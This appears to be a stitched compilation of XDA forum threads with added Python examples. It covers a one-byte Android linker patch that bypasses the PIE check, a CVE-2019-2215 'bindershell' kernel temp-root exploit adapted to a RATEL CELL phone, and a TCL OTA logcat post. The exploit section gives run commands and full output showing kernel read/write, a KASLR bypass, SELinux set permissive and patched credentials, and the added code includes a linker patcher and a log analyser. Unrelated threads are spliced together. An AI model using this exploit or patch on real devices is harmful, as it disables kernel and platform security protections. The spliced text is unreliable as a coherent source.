Last month, Chainfire posted a nice writeup on several new security changes happening upstream in AOSP. There has been much discussion of the SELinux changes and what that means for root apps, but I'd like to touch on another change that can affect even garden variety non-root apps: mandatory PIE (position-independent executables).
If you're running the Android "L" developer preview image, you may have noticed that some of your native binaries no longer execute:
Code:
$ ./curl --help
error: only position independent executables (PIE) are supported.
PIE is a useful security feature, as randomizing the address space makes it significantly more difficult for an attacker to exploit bugs in a program. However, in this case, one must trade off compatibility for security: PIE is only available in JB 4.1 and above, so most app developers targeting a wide range of Android versions have disabled PIE in their builds. The new PIE check in "L" will cause breakage for most apps that ship native executables.
As it turns out, even some of the precompiled binaries shipped with Android itself are affected, and Google has temporarily disabled PIE enforcement. It is not clear whether they will re-enable it at a later date.
Since the Android "L" preview images were built prior to Google's latest change, they still have PIE enabled. I am attaching a flashable "bypass-pie.zip" which overwrites one byte in /system/bin/linker to bypass the PIE check:
Code:
3a06: f8c6 5098 str.w r5, [r6, #152] ; 0x98
3a0a: f8c6 4100 str.w r4, [r6, #256] ; 0x100
3a0e: 8a0a ldrh r2, [r1, #16]
3a10: 2a03 cmp r2, #3
3a12: d007 beq.n 3a24 // change to e007 (b.n)
3a14: 4992 ldr r1, [pc, #584] ; (3c60)
3a16: 2002 movs r0, #2
3a18: 4479 add r1, pc
Use this at your own risk. It works for me. The same non-PIE curl binary now runs correctly with the patched linker:
Code:
$ ./curl --help
Usage: curl [options...] <url>
Options: (H) means HTTP/HTTPS only, (F) means FTP only
--anyauth Pick "any" authentication method (H)
-a, --append Append to target file when uploading (F/SFTP)
--basic Use HTTP Basic Authentication (H)
--cacert FILE CA certificate to verify peer against (SSL)
[...]
This was tested on hammerhead-lpv79-preview-ac1d8a8e.tgz. If somebody wants to test on razor-lpv79-preview-d0ddf8ce.tgz and post the result, that would be helpful.
It is not necessary to wipe any caches after flashing, although you may want to "clear data" for any apps that were crashing prior to applying the change so that they can start fresh.
Update 2014/07/21: AOSP has re-enabled the PIE check after recompiling their last non-PIE binary. I filed a ticket asking Google to revert this change in order to avoid breaking ABI compatibility.
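As an added illustration (my code, not cernekee's attachment and not the AOSP linker source), here is a Python stand-in for the check the disassembly above implements, plus a function that makes the same one-byte edit bypass-pie.zip makes. The instructions `ldrh r2, [r1, #16]` / `cmp r2, #3` read `e_type` at offset 16 of the ELF header and compare it with 3 (ET_DYN): a binary is "PIE" to this linker exactly when it is linked as ET_DYN. The ELF headers and the linker fragment the code operates on are constructed samples; the byte pattern is the little-endian form of the halfwords shown in the disassembly.

```python
# Added example, not from cernekee's post or the AOSP linker: a stand-in for
# the PIE check the "L" linker runs before loading an executable, and a
# locator for the single byte that bypass-pie.zip flips.
import struct

ELF_MAGIC = b"\x7fELF"
ELFCLASS32, ELFCLASS64 = 1, 2
ELFDATA2LSB, ELFDATA2MSB = 1, 2
ET_EXEC, ET_DYN = 2, 3
E_TYPE_OFFSET = 16      # e_type directly follows the 16-byte e_ident (ELF32 and ELF64)
PIE_ERROR = "error: only position independent executables (PIE) are supported."


def elf_type(blob: bytes) -> int:
    """Return e_type, honouring the byte order declared in e_ident[EI_DATA]."""
    if len(blob) < E_TYPE_OFFSET + 2 or blob[:4] != ELF_MAGIC:
        raise ValueError("not an ELF image")
    if blob[4] not in (ELFCLASS32, ELFCLASS64):
        raise ValueError("unknown ELF class %d" % blob[4])
    order = {ELFDATA2LSB: "<", ELFDATA2MSB: ">"}.get(blob[5])
    if order is None:
        raise ValueError("unknown ELF data encoding %d" % blob[5])
    return struct.unpack_from(order + "H", blob, E_TYPE_OFFSET)[0]


def is_pie(blob: bytes) -> bool:
    """The linker's criterion: PIE means 'linked as ET_DYN', nothing more."""
    return elf_type(blob) == ET_DYN


def linker_check(blob: bytes):
    """None if the linker would go on to load the binary, else the text it writes to fd 2."""
    return None if is_pie(blob) else PIE_ERROR


# The three Thumb instructions of the check as they sit on disk (each 16-bit
# halfword stored little-endian):
#   8a0a  ldrh r2, [r1, #16]  -> 0a 8a   load e_type
#   2a03  cmp  r2, #3         -> 03 2a   is it ET_DYN?
#   d007  beq.n <past error>  -> 07 d0   conditional branch around the error path
CHECK_SITE = bytes.fromhex("0a8a032a07d0")
PATCHED_SITE = bytes.fromhex("0a8a032a07e0")   # d0 -> e0: beq.n becomes b.n, same target


def patch_pie_check(linker: bytes) -> bytes:
    """Make the branch unconditional; refuse to guess if the pattern is not unique."""
    hits = linker.count(CHECK_SITE)
    if hits != 1:
        raise ValueError("expected exactly one PIE check site, found %d" % hits)
    off = linker.find(CHECK_SITE)
    return linker[:off] + PATCHED_SITE + linker[off + len(PATCHED_SITE):]


def _elf_header(e_type: int, elf64: bool = False, big_endian: bool = False) -> bytes:
    """Constructed sample: a bare ELF header with the requested e_type (no code behind it)."""
    ident = (ELF_MAGIC
             + bytes([ELFCLASS64 if elf64 else ELFCLASS32,
                      ELFDATA2MSB if big_endian else ELFDATA2LSB,
                      1])                              # EV_CURRENT
             + b"\0" * 9)
    fmt = (">" if big_endian else "<") + ("HHIQQQIHHHHHH" if elf64 else "HHIIIIIHHHHHH")
    e_machine = 0xB7 if elf64 else 0x28                # EM_AARCH64 / EM_ARM
    return ident + struct.pack(fmt, e_type, e_machine, 1, 0, 0, 0, 0,
                               64 if elf64 else 52, 0, 0, 0, 0, 0)


NON_PIE_ARM = _elf_header(ET_EXEC)      # what a JB-compatible, non-PIE curl looks like
PIE_ARM = _elf_header(ET_DYN)           # built with -fPIE -pie

# Constructed linker fragment: the instructions at 3a06..3a18 in the post's
# disassembly as little-endian halfwords, with nothing else around them.
SAMPLE_LINKER = (bytes.fromhex("c6f89850" "c6f80041")   # str.w r5,[r6,#0x98]; str.w r4,[r6,#0x100]
                 + CHECK_SITE
                 + bytes.fromhex("9249" "0220" "7944"))  # ldr r1,[pc,#584]; movs r0,#2; add r1,pc

if __name__ == "__main__":
    for name, blob in (("non-PIE", NON_PIE_ARM), ("PIE", PIE_ARM)):
        print(name, "->", linker_check(blob) or "loads")
    site = SAMPLE_LINKER.find(CHECK_SITE) + 5
    print("byte at offset %d: %#x -> %#x" % (site, SAMPLE_LINKER[site],
                                             patch_pie_check(SAMPLE_LINKER)[site]))
```

The patcher searches for the instruction sequence rather than writing to a fixed offset and refuses to proceed unless exactly one match is found, which is the guard you want before touching /system/bin/linker: as a later post in this thread shows, the lpx13d linker carries the same `LDRH`/`CMP`/`BEQ` sequence at a different address, so a fixed-offset patch misses it while a pattern search still finds it.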
Does this fix the root access issue with Titanium Backup, Helium and a bunch of other root apps?
So which one should we use to have proper root, curl or the PIE bypass?
Never mind, even using the PIE bypass still gives me the app optimizing process. I'll try the curl zip.
itskapil said:
Does this fix the root access issue with Titanium Backup, Helium and a bunch of other root apps?
No, it doesn't. I don't think that is the problem this aims to fix.
itskapil said:
Does this fix the root access issue with Titanium Backup, Helium and a bunch of other root apps?
Smh
It fixes the twitter issue though. Cheers!
shanyel said:
It fixes the twitter issue though. Cheers!
Twitter still doesn't work for me...
BTW, do I have to wipe cache and Dalvik cache after flashing?
CrashOverride1995 said:
Twitter still doesn't work for me...
BTW do I have to wipe cache and dalvik cache after flashing?
Yes, I did.
Nice thanks for the share!
Thank you. This fixed Dropbox for me.
Well it did; now it FCs again.
cernekee said:
This was tested on hammerhead-lpv79-preview-ac1d8a8e.tgz. If somebody wants to test on razor-lpv79-preview-d0ddf8ce.tgz and post the result, that would be helpful.
This runs fine on razor-lpv-79-preview!
I can use Dropbox now...
Thanks a lot!!!
Add the linker option ...
Add the "-fPIE -pie" linker options.
For those still getting PIE errors in the latest L build (lpx13d), I found that the binary linked in this thread will not work as a drop-in fix for that. After checking the binaries, they are in fact different; however, I managed to repatch the newer binary with the same fix. I have yet to actually test this modification, but it's the same patch in principle:
Code:
.text:000032D4 STR.W R5, [R6,#0x98]
.text:000032D8 STR.W R4, [R6,#0x100]
.text:000032DC LDRH R2, [R1,#0x10]
.text:000032DE CMP R2, #3
.text:000032E0 BEQ loc_32F2 <---- replace D007 (07 D0) with E007 (07 E0, B loc_32F2)
.text:000032E2 LDR R1, =(aErrorOnlyPosit - 0x32EA)
.text:000032E4 MOVS R0, #2
.text:000032E6 ADD R1, PC ; "error: only position independent execut"...
.text:000032E8 BL __dl___libc_format_fd
ZIP attached, again, I have no idea if this works or not. But for those who needed the patch previously, it's here again.
EDIT: Fixes several issues for me, and doesn't crash like the previous executable did. So far it fixes the actual PIE issues in SSHTunnel (although it can't do global IPTABLES support still) and it fixes SSHDroid's PIE issues.
EDIT 2: Fixes ES File Explorer as well.
^ Thank you sir. I just updated my N5 to the 13d build and when I rebooted most of my root apps were borked, so I looked for a fix and flashed the zip, and it actually fixed my issues.
I don't know if that was the intended result, but that is what came out for me.
shinyquagsire23 said:
For those still getting PIE errors in the latest L build (lpx13d), I found that the binary linked in this thread will not work as a drop-in fix for that.
Thanks, gonna test this on mako.
Edit: this works great on the N6 leak mako ROM. Great work, this made quite a few thousand people happy. Good work man.
This has fixed the VPN issue for me; Hotspot Shield is working perfectly now!
THANK YOU!
Has anyone tried the last patch on the razor?
gr4ce said:
Has anyone tried the last patch on the razor?
Seems to be working for me on FLO. Root is working as it should for ES File Explorer.
\o/
Thanks for the patch! This fixed TitaniumBackup for me. Tested with Hammerhead and Flo on LPX13D.
Sorry for asking, but do we also have to flash the curl file or just the pie.zip? Thanks.
Hi xda,
I am trying to run the keystore APIs on a DragonBoard 410c, which has the Android 5 Lollipop release.
I am referring to the Keystore training article (developer.android.com/training/articles/keystore.html) to get a keystore instance.
But I always get an error that AndroidKeyStore doesn't exist: a no such provider exception.
I also tried listing all the security providers on the board with java.security.Security.getProviders(), but no luck. The AndroidOpenSSL and BC providers exist, but there is no AndroidKeyStore provider.
In the above link, it is specified that:
AndroidKeyStore provider introduced in Android 4.3 (API level 18).
We tried with API 21 to 23 but still have the same issue. Can someone point out what I'm doing wrong?
About a recent news item, the "Water Drops" Attack: Explain the Binder Kernel Passing Vulne
360 found this vuln. Could someone who is good with the system find a way to root the Mate 20 and avoid unlocking the BL?
http://blogs.360.cn/post/Binder_Kernel_Vul_CH.html
Hello,
I have a device called RATEL CELL R1020 with OS android 8.0 oreo.
I tried some applications for rooting this smartphone like KingRoot, KingoRoot, etc., but failed. This device can't unlock the bootloader, so I looked at rooting with an exploit on YouTube, like ThomasKing does. Can anyone here please help me root my smartphone?
4.4.78perf+ kernel
this attachment is screenshot of the system
Thankyou
j4nn said:
@arifincaesar, do you have your phone's firmware in a downloadable form? Can you obtain linux kernel source code for your phone?
I could imagine adapting this (exploit source code here) for your phone, but the kernel binary that is running on the phone is a must pre-requisite. Obviously it would be only a temp root.
arifincaesar said:
There is no way to get the firmware of this phone, sir,
and there's no way to unlock the bootloader.
I think the only way to back up the firmware of this device is an exploit, getting root access without UBL.
It just says 4.4.78-perf+.
In my opinion, there is no exploit that would not need offsets within the kernel image in advance.
Because of that you need a copy of the kernel binary that is running on the phone.
Obviously it is not possible to back up the kernel partition from the phone, so you would need the original fw (the same version that is running on the phone) and a way to extract the kernel from the fw package.
Without that you are out of luck, sorry...
Since there is a Linux kernel running on the phone (Android uses the Linux kernel) you have legal options to request the corresponding kernel source code, because the Linux kernel is distributed under the GPL license.
But even if you obtained the kernel source, you would still need the binary, because most likely a new build from source would not be binary identical. The source code would just make it easy to decide which exploit could work, so it would make sense to adapt it for the kernel binary.
j4nn said:
In my opinion, there is no exploit that would not need offsets within the kernel image in advance.
Is that a bug, when I have activated OEM unlock in dev options but cannot unlock in fastboot mode?
j4nn said:
Without that you are out of luck, sorry...
Can you help me please?
arifincaesar said:
Can you help me please?
Interesting. Getting kernel space R/W primitives is a nice first step.
But without kernel binary, that still may be difficult - with kernel 4.4.78 version, KASLR would be there for sure.
j4nn said:
Interesting. Getting kernel space R/W primitives is a nice first step.
But without kernel binary, that still may be difficult - with kernel 4.4.78 version, KASLR would be there for sure.
Hehe, I keep watching your exploit work, sir.
If there is a new exploit I'll try it on my phone.
Thanks in advance.
@arifincaesar, try this please:
Code:
cd /data/local/tmp
echo -e '#!/system/bin/sh\ncase "$1" in\n*model) echo G8441 ;;*) echo 47.1.A.8.49 ;;esac' > getprop
chmod 755 getprop
PATH=`pwd`:$PATH ./bindershell
That should try the offsets defined for xz1c. It's a blind try, but let's see.
Please post the log in a text form (copy it via clipboard from the terminal), using the CODE tags in the message (can be used with the # icon in advanced post).
I can't believe it, it works bro, I swear :v
Is my phone rooted?
Nope, I think my phone is not rooted yet..
I checked with Root Checker and it says "sorry root access is not properly installed on this device."
@j4nn here's the output
bindershell - temp root shell for xperia XZ1c/XZ1/XZp using CVE-2019-2215
https://github.com/j4nn/renoshell/tree/CVE-2019-2215
MAIN: starting exploit for devices with waitqueue at 0x98
PARENT: Reading leaked data
PARENT: leaking successful
MAIN: thread_info should be in stack
MAIN: parsing kernel stack to find thread_info
PARENT: Reading leaked data
PARENT: Reading extra leaked data
PARENT: leaking successful
MAIN: task_struct_ptr = ffffffcfe0d68000
MAIN: thread_info_ptr = ffffffd04aa3c000
MAIN: Clobbering addr_limit
MAIN: should have stable kernel R/W now
kernel slide invalid (0x4ffabc7b50)
kaslr slide 0x0
selinux set to permissive
current task credentials patched
got root, start shell...
Cell:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:shell:s0
Cell:/data/local/tmp # cd
Cell:/ # ls
ls: ./cache: Permission denied
ls: ./init: Permission denied
ls: ./init.environ.rc: Permission denied
ls: ./init.rc: Permission denied
ls: ./init.recovery.qcom.rc: Permission denied
ls: ./init.usb.configfs.rc: Permission denied
ls: ./init.usb.rc: Permission denied
ls: ./init.zygote32.rc: Permission denied
ls: ./init.zygote64_32.rc: Permission denied
ls: ./postinstall: Permission denied
ls: ./ueventd.rc: Permission denied
ls: ./verity_key: Permission denied
acct bt_firmware bugreports charger config d data default.prop dev dsp etc firmware lost+found mnt oem persist proc res root sbin sdcard storage sys system vendor
1|Cell:/ #
@arifincaesar, well, as expected, detecting KASLR slide failed, therefore selinux could not be disabled and security context has not been patched either.
Without a kernel binary, it is difficult to implement a full temp root exploit.
I guess it could be doable, unfortunately I do not have the time for it.
j4nn said:
@arifincaesar, well, as expected, detecting KASLR slide failed, therefore selinux could not be disabled and security context has not been patched either.
Hehe, thanks for the information sir..
@arifincaesar, see PM please...
j4nn said:
@arifincaesar, see PM please...
OK sir, thank you very much for helping me.. T_T
PM sent.
cve-2019-2215 based temp root exploit for ratel cell r1020
Here is a temp root exploit tailored specifically for the RATEL CELL r1020 phone as described in the OP (Android 8.0 with security patch level of January 5, 2018). The exploit uses CVE-2019-2215, which can get you a temporary root shell very quickly and reliably (it's nearly instant).
Unfortunately RATEL CELL r1020 firmware is not publicly available, so it had not been possible to get a kernel image for analysis.
Luckily the first stage of the exploit designed for sony xperia xz1/xz1/xz1c worked, providing kernel space R/W primitives.
Eventually a kernel memory dump was retrieved (after a KASLR bypass done in a generic way), so the final stage to bypass selinux and patch credentials to get root could be implemented.
Please find the result of my work attached here, it obviously is not tested as I do not have that phone, but I assume it would work as using similarly calculated stuff worked with my xz1c phone.
Please see the xperia phones exploit here for usage howto, including possibility to setup magisk from the exploit (modified script without sony specific stuff is already included). Just download the Magisk-v19.3-Manager-v7.1.2.zip from the linked post and use together with stuff from ratel-cell-temp-root.zip attached here.
EDIT: Updated ratel cell temp root with v2, supposed to work also with ratel cell having May 1, 2018 security patch level.
Please post the log (in [ CODE ] tags) and/or screenshots from your testing, possibly including even magisk setup, if bindershell exploit worked.
If you like my work, you can donate to me via paypal (including card payment) or bitcoin - for details just follow the "Donate to Me" button please. Thank you.
Thread closed per OP request.
MOD ACTION:
Thread reopened per OP's request
j4nn said:
Here is a temp root exploit tailored specifically for RATEL CELL r1020 phone as described in the OP (Android 8.0 with security patch level of January 5, 2018).
Yes, it works sir, thank you so much. Here is the log,
but I think there is another problem; I will post it here later.
Code:
Cell:/data/local/tmp $ ./bindershellnew
bindershell - temp root shell using CVE-2019-2215, tailored for RATEL CELL R1020
https://github.com/j4nn/renoshell/tree/CVE-2019-2215
MAIN: starting exploit for devices with waitqueue at 0x98
PARENT: Reading leaked data
PARENT: leaking successful
MAIN: thread_info should be in stack
MAIN: parsing kernel stack to find thread_info
PARENT: Reading leaked data
PARENT: Reading extra leaked data
PARENT: leaking successful
MAIN: task_struct_ptr = ffffffd4316e9b00
MAIN: thread_info_ptr = ffffffd471268000
MAIN: Clobbering addr_limit
MAIN: should have stable kernel R/W now
attempting kaslr bypass: leaked ptr 0xffffff8a82608658
kernel base=0xffffff8a81480000 slide=0xa79400000
selinux set to permissive
current task credentials patched
got root, start shell...
Cell:/data/local/tmp # getenforce
Permissive
Cell:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:toolbox:s0
Cell:/data/local/tmp # uname -a
Linux localhost 4.4.78-perf+ #1 SMP PREEMPT Tue Mar 6 11:00:11 CST 2018 aarch64
Cell:/data/local/tmp #
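To make the difference between the two runs concrete, here is an added example (my code, not j4nn's exploit) that reads the two posted logs and applies the arithmetic behind the slide values they print. It rests on two assumptions, marked in the code as well: arm64 KASLR shifts the kernel image by a multiple of 2 MiB, so a candidate slide that is negative or not 2 MiB aligned is rejected; and the unslid kernel base, 0xffffff8008080000, is taken to be the second log's "kernel base" minus its "slide". The log excerpts are trimmed from the two posts above, not invented.

```python
# Added example, not j4nn's exploit code: reads a bindershell log the way the
# reply above does by hand, and shows the arithmetic behind the slide values
# the two runs printed. Assumptions (also stated in the lead-in):
#   * arm64 KASLR shifts the image by a multiple of 2 MiB, so any real slide
#     is non-negative and 2 MiB aligned;
#   * the unslid kernel base is the second log's "kernel base" minus "slide".
import re

KASLR_ALIGN = 0x200000                                    # 2 MiB (assumption)
KERNEL_BASE_UNSLID = 0xffffff8a81480000 - 0xa79400000     # = 0xffffff8008080000

_LEAK = re.compile(r"leaked ptr (0x[0-9a-f]+)")
_SLIDE_INVALID = re.compile(r"kernel slide invalid \((0x[0-9a-f]+)\)")
_KASLR_OK = re.compile(r"kernel base=(0x[0-9a-f]+) slide=(0x[0-9a-f]+)")
_ID_LINE = re.compile(r"\buid=(\d+)\(\w+\).*\bcontext=(\S+)")
_GETENFORCE = re.compile(r"^(Enforcing|Permissive)$")


def slide_is_plausible(slide: int) -> bool:
    """A negative or non-2MiB-aligned value cannot be a real KASLR offset."""
    return slide >= 0 and slide % KASLR_ALIGN == 0


def unslide(ptr: int, slide: int) -> int:
    """Map a leaked (slid) kernel pointer back to its address in the unslid image."""
    return ptr - slide


def assess(log: str) -> dict:
    """Decide from the log alone whether a run really got a usable root shell."""
    r = {"kernel_rw": False, "leaked_ptr": None, "rejected_slide": None,
         "kernel_base": None, "slide": None, "kaslr_bypassed": False,
         "uid": None, "context": None, "getenforce": None}
    for line in log.splitlines():
        line = line.strip()
        if "should have stable kernel R/W now" in line:
            r["kernel_rw"] = True
            continue
        m = _LEAK.search(line)
        if m:
            r["leaked_ptr"] = int(m.group(1), 16)
            continue
        m = _SLIDE_INVALID.search(line)
        if m:
            r["rejected_slide"] = int(m.group(1), 16)
            continue
        m = _KASLR_OK.search(line)
        if m:
            base, slide = int(m.group(1), 16), int(m.group(2), 16)
            r["kernel_base"], r["slide"] = base, slide
            r["kaslr_bypassed"] = (slide_is_plausible(slide)
                                   and base - slide == KERNEL_BASE_UNSLID)
            continue
        m = _ID_LINE.search(line)
        if m:
            r["uid"], r["context"] = int(m.group(1)), m.group(2)
            continue
        m = _GETENFORCE.match(line)
        if m:
            r["getenforce"] = m.group(1)
    r["leaked_ptr_unslid"] = (unslide(r["leaked_ptr"], r["slide"])
                              if r["leaked_ptr"] is not None and r["slide"] is not None
                              else None)
    # "selinux set to permissive" and "got root" were printed in both runs, so
    # they prove nothing on their own: the slide must actually have been found.
    r["full_root"] = r["uid"] == 0 and r["kaslr_bypassed"]
    return r


# Log excerpts trimmed from the two runs posted in this thread.
LOG_BLIND = """\
MAIN: starting exploit for devices with waitqueue at 0x98
MAIN: task_struct_ptr = ffffffcfe0d68000
MAIN: thread_info_ptr = ffffffd04aa3c000
MAIN: Clobbering addr_limit
MAIN: should have stable kernel R/W now
kernel slide invalid (0x4ffabc7b50)
kaslr slide 0x0
selinux set to permissive
current task credentials patched
got root, start shell...
Cell:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:shell:s0
"""

LOG_TAILORED = """\
MAIN: should have stable kernel R/W now
attempting kaslr bypass: leaked ptr 0xffffff8a82608658
kernel base=0xffffff8a81480000 slide=0xa79400000
selinux set to permissive
current task credentials patched
got root, start shell...
Cell:/data/local/tmp # getenforce
Permissive
Cell:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:toolbox:s0
"""

if __name__ == "__main__":
    for name, log in (("blind xz1c offsets", LOG_BLIND), ("tailored", LOG_TAILORED)):
        a = assess(log)
        print(name, "-> full root:", a["full_root"], "context:", a["context"],
              "slide:", None if a["slide"] is None else hex(a["slide"]))
```

The point of the parser is the one j4nn made by hand: the blind run printed "selinux set to permissive" and "got root" even though the slide it derived (0x4ffabc7b50, not 2 MiB aligned) had been thrown away, and the shell it opened still carried context u:r:shell:s0. A checker keyed on those success strings would call the first run rooted; the slide line, the getenforce output and the context in `id` are what actually separate the two. The unslid base the example computes, 0xffffff8008080000, is also what the leaked pointer is rebased against, so 0xffffff8a82608658 maps to 0xffffff8009208658 in the unslid image.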
Hi there sir @j4nn .
I'm yusuv, a Ratel Cell user. I've been following this thread.
And lately it seems the exploit works as intended.
The thing is, Ratel Cell does not only have the January patch on all the devices. I've tried the exploit and it's stuck on the build number prop and won't go any further.
Afaik, Ratel has 2 ROM builds: one has the January patch, which you built the exploit for, and the other one has the May 1, 2018 patch, also with a different build number.
On behalf of Ratel Cell users with the May patch, I'm here to ask you: is there any way for those of us with the May patch to root our devices?
Thanks in advance.
Dear sir @j4nn,
Can you help us with how to install a custom recovery on the Ratel Cell? If you are willing to help, we will be very grateful.
Just got the April OTA offer. Weird for TCL to do an update this fast, since the last one was for March.
Hopefully everyone by now knows how to pull logcat; if not, reference my previous post.
3.0.8AI7 TCL 10 Pro Android 11 Firmware OTA 0.9GB March 2022 (forum.xda-developers.com)
Or use the application called ADB App Control https://adbappcontrol.com/en/
If pulling the entire logcat like I do, save yourself some time and search for "small task url".
Here are the links pulled from my logcat of the newest update:
OtaApp###D: small task url = https://g2slave-us-east-01.tclcom.com/64c9b63f5a85fdd27b552eec614f884add8fdb67/35/762335
OtaApp###D: small task url = https://g2slave-ap-south-01.tclcom.com/64c9b63f5a85fdd27b552eec614f884add8fdb67/35/762335
OtaApp###D: small task url = https://g2slave-eu-west-01.tclcom.com/64c9b63f5a85fdd27b552eec614f884add8fdb67/35/762335
OtaApp###D: small task url = https://g2slave-ap-north-01.tclcom.com/64c9b63f5a85fdd27b552eec614f884add8fdb67/35/762335
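For readers who pull a whole logcat rather than grepping on the phone, here is an added example (my code, not the poster's tooling) that extracts the small task URLs and groups them by object path, which makes it visible that the four lines above name one OTA artifact served from four regional hosts. The four URL lines are the ones posted; the other log lines in the sample are constructed filler, and the https-only check is my own addition.

```python
# Added example, not the poster's code: pull "small task url" lines out of a
# logcat dump and group them by path across mirrors. The four URL lines are
# the posted ones; the remaining sample lines are constructed filler.
import re
from urllib.parse import urlsplit

_SMALL_TASK = re.compile(r"small task url = (\S+)")

SAMPLE_LOGCAT = """\
ActivityManager: Start proc 1234:com.example (constructed filler line)
OtaApp###D: small task url = https://g2slave-us-east-01.tclcom.com/64c9b63f5a85fdd27b552eec614f884add8fdb67/35/762335
OtaApp###D: small task url = https://g2slave-ap-south-01.tclcom.com/64c9b63f5a85fdd27b552eec614f884add8fdb67/35/762335
OtaApp###D: checking for update (constructed filler line)
OtaApp###D: small task url = https://g2slave-eu-west-01.tclcom.com/64c9b63f5a85fdd27b552eec614f884add8fdb67/35/762335
OtaApp###D: small task url = https://g2slave-ap-north-01.tclcom.com/64c9b63f5a85fdd27b552eec614f884add8fdb67/35/762335
"""


def ota_urls(logcat: str) -> list:
    """Every small-task URL in the order it was logged, duplicates included."""
    found = []
    for line in logcat.splitlines():
        m = _SMALL_TASK.search(line)
        if m:
            found.append(m.group(1))
    return found


def group_by_path(urls) -> dict:
    """Map each object path to the sorted list of hosts that serve it.

    Raises if any URL is not https: an OTA fetched in the clear is worth
    flagging before anything else (my check, not the OTA client's).
    """
    groups = {}
    for u in urls:
        parts = urlsplit(u)
        if parts.scheme != "https":
            raise ValueError("non-https OTA url: %s" % u)
        groups.setdefault(parts.path, set()).add(parts.netloc)
    return {path: sorted(hosts) for path, hosts in groups.items()}


if __name__ == "__main__":
    for path, hosts in group_by_path(ota_urls(SAMPLE_LOGCAT)).items():
        print(path)
        for h in hosts:
            print("   ", h)
```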